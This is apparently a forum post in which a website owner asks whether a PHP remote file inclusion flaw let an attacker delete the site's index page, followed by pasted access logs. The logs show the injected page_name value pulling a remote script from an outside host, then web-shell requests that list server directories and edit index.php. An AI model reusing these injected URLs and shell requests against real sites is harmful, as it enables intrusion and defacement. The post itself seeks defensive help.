I got hacked. Is this the reason?


jandrox_ox

A website I helped build recently got hacked (the index page got deleted). I checked the permissions of the folders, all 755. In the access logs I see someone trying to access this URL:

 

/index.php?page_name=http://freewebs.com/xugurx/ugur.txt?

 

Normally, the page_name variable tells the system from what table to load the information (all the web's info is loaded from a DB).  The person that coded the index page did not check the input (I told him to only accept alpha numerical characters but...). Do you think this is the way the website got hacked? Here are more of the same session's access logs.

 

Can anyone tell me how to fix this (apart from the obvious filtering the input to make sure that it is only alpha-numerical)? Could you also recommend me a good tutorial/book on php/web security? I am planning on re-writing the whole system using the cakephp framework and I want to make sure this doesn't happen again.

 

Host: 85.105.132.102


    *  


/index.php?page_name=Fundraising
Http Code: 200 	Date: Dec 06 07:07:30 	Http Version: HTTP/1.1 	Size in Bytes: 15749
Referer: http://www.google.com.tr/search?hl=tr&q=%22Failed+Opening%22inurl%3A%3D%22citizens%22&
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?act=ls&d=%2Fetc%2Fvdomainaliases%2F
Http Code: 200 	Date: Dec 06 07:15:37 	Http Version: HTTP/1.1 	Size in Bytes: 18328
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/universal.css
Http Code: 304 	Date: Dec 06 07:17:22 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/normalize.css
Http Code: 304 	Date: Dec 06 07:17:22 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/header.css
Http Code: 304 	Date: Dec 06 07:17:22 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/nav.css
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/mod_css.css
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/bill.jpg
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/css/caption.css
Http Code: 304 	Date: Dec 06 07:17:23 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/theme/default/esstyle.css
Http Code: 304 	Date: Dec 06 07:17:24 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/overLIB/overlib_mini.js
Http Code: 304 	Date: Dec 06 07:17:25 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/logo_csj_small.png
Http Code: 304 	Date: Dec 06 07:17:25 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_col_left.gif
Http Code: 304 	Date: Dec 06 07:17:26 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_col_right.gif
Http Code: 304 	Date: Dec 06 07:17:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/wilber%20pic.jpg
Http Code: 304 	Date: Dec 06 07:17:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/slideshow/AC_RunActiveContent.js
Http Code: 304 	Date: Dec 06 07:17:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_content.gif
Http Code: 304 	Date: Dec 06 07:17:28 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/slideshow.swf
Http Code: 304 	Date: Dec 06 07:17:28 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/rights.jpg
Http Code: 304 	Date: Dec 06 07:17:31 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/kennedy_thumb.jpg
Http Code: 304 	Date: Dec 06 07:17:31 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/images.txt
Http Code: 304 	Date: Dec 06 07:17:33 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/American_Flag_2.jpg
Http Code: 304 	Date: Dec 06 07:17:34 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/b_make_donation.jpg
Http Code: 304 	Date: Dec 06 07:17:35 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/bk_cal_expand.gif
Http Code: 304 	Date: Dec 06 07:17:35 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/paine.jpg
Http Code: 304 	Date: Dec 06 07:17:35 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/theme/default/monthBg.gif
Http Code: 304 	Date: Dec 06 07:17:36 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/b_get_involved.jpg
Http Code: 304 	Date: Dec 06 07:17:36 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/calendar/theme/default/dayBg.gif
Http Code: 304 	Date: Dec 06 07:17:36 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/common.jpg
Http Code: 304 	Date: Dec 06 07:17:39 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/images/header.jpg
Http Code: 304 	Date: Dec 06 07:17:41 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic4.jpg
Http Code: 304 	Date: Dec 06 07:17:43 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/education.jpg
Http Code: 304 	Date: Dec 06 07:17:44 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/magna.jpg
Http Code: 304 	Date: Dec 06 07:17:47 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/MartinLutherKingJr.jpg
Http Code: 304 	Date: Dec 06 07:17:51 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/pov%20pic2.jpg
Http Code: 304 	Date: Dec 06 07:17:52 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/rawls.jpg
Http Code: 304 	Date: Dec 06 07:17:55 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/kenn.bmp
Http Code: 304 	Date: Dec 06 07:17:59 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic1.jpg
Http Code: 304 	Date: Dec 06 07:18:00 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/vote.jpg
Http Code: 304 	Date: Dec 06 07:18:08 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic2.jpg
Http Code: 304 	Date: Dec 06 07:18:08 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/the%20wall.jpg
Http Code: 304 	Date: Dec 06 07:18:11 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/fdoug.jpg
Http Code: 304 	Date: Dec 06 07:18:16 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/lib%20pic1.jpg
Http Code: 304 	Date: Dec 06 07:18:16 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/sac.jpg
Http Code: 304 	Date: Dec 06 07:18:19 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/htub.jpg
Http Code: 304 	Date: Dec 06 07:18:24 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/lib%20pic3.jpg
Http Code: 304 	Date: Dec 06 07:18:24 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/arlington.jpg
Http Code: 304 	Date: Dec 06 07:18:27 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/lincoln.jpg
Http Code: 304 	Date: Dec 06 07:18:32 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/com%20pic3.jpg
Http Code: 304 	Date: Dec 06 07:18:32 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/flag.jpg
Http Code: 304 	Date: Dec 06 07:18:38 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?act=ls&d=%2Fhome%2Fayovan%2Fpublic_html%2F
Http Code: 200 	Date: Dec 06 07:18:38 	Http Version: HTTP/1.1 	Size in Bytes: 18349
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/tmarsh.jpg
Http Code: 304 	Date: Dec 06 07:18:40 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/christ.jpg
Http Code: 304 	Date: Dec 06 07:18:48 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=sort_asc
Http Code: 200 	Date: Dec 06 07:18:47 	Http Version: HTTP/1.1 	Size in Bytes: 11094
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=small_dir
Http Code: 200 	Date: Dec 06 07:18:47 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_lnk
Http Code: 200 	Date: Dec 06 07:18:48 	Http Version: HTTP/1.1 	Size in Bytes: 11085
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_ftpquota
Http Code: 200 	Date: Dec 06 07:18:49 	Http Version: HTTP/1.1 	Size in Bytes: 11137
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_js
Http Code: 200 	Date: Dec 06 07:18:50 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_htaccess
Http Code: 200 	Date: Dec 06 07:18:52 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_error_log
Http Code: 200 	Date: Dec 06 07:18:53 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_zip
Http Code: 200 	Date: Dec 06 07:18:54 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_css
Http Code: 200 	Date: Dec 06 07:18:55 	Http Version: HTTP/1.1 	Size in Bytes: 11110
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/libbell.jpg
Http Code: 304 	Date: Dec 06 07:18:56 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_swf
Http Code: 200 	Date: Dec 06 07:18:55 	Http Version: HTTP/1.1 	Size in Bytes: 11094
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=arrow_ltr
Http Code: 200 	Date: Dec 06 07:18:56 	Http Version: HTTP/1.1 	Size in Bytes: 11085
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http://freewebs.com/xugurx/140.txt?
Http Code: 200 	Date: Dec 06 07:18:52 	Http Version: HTTP/1.1 	Size in Bytes: 83494
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/140
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/dec.jpg
Http Code: 206 	Date: Dec 06 07:19:04 	Http Version: HTTP/1.1 	Size in Bytes: 1893374
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/wetp.jpg
Http Code: 304 	Date: Dec 06 07:19:15 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=f&f=index.php&ft=edit&am
Http Code: 200 	Date: Dec 06 07:19:20 	Http Version: HTTP/1.1 	Size in Bytes: 53061
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http://freewebs.com/xugurx/ugu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/vietnam.jpg
Http Code: 206 	Date: Dec 06 07:20:00 	Http Version: HTTP/1.1 	Size in Bytes: 203714
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=home
Http Code: 200 	Date: Dec 06 07:20:38 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=back
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=forward
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=up
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=refresh
Http Code: 200 	Date: Dec 06 07:20:39 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=search
Http Code: 200 	Date: Dec 06 07:20:40 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=buffer
Http Code: 200 	Date: Dec 06 07:20:40 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_php
Http Code: 200 	Date: Dec 06 07:20:41 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_html
Http Code: 200 	Date: Dec 06 07:20:41 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_txt
Http Code: 200 	Date: Dec 06 07:20:41 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_diz
Http Code: 200 	Date: Dec 06 07:20:42 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_exe
Http Code: 200 	Date: Dec 06 07:20:42 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_gif
Http Code: 200 	Date: Dec 06 07:20:42 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/back/images/cicero.jpg
Http Code: 304 	Date: Dec 06 07:20:43 	Http Version: HTTP/1.1 	Size in Bytes: -
Referer: http://www.citizensforsocialjustice.com/slideshow.swf
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_ini
Http Code: 200 	Date: Dec 06 07:20:49 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=download
Http Code: 200 	Date: Dec 06 07:20:49 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=ext_rtf
Http Code: 200 	Date: Dec 06 07:20:50 	Http Version: HTTP/1.1 	Size in Bytes: 90
Referer: http://www.citizensforsocialjustice.com/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxu
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)





    *  


/index.php?page_name=http%3A%2F%2Ffreewebs.com%2Fxugurx%2Fugur.txt%3F&act=img&img=change
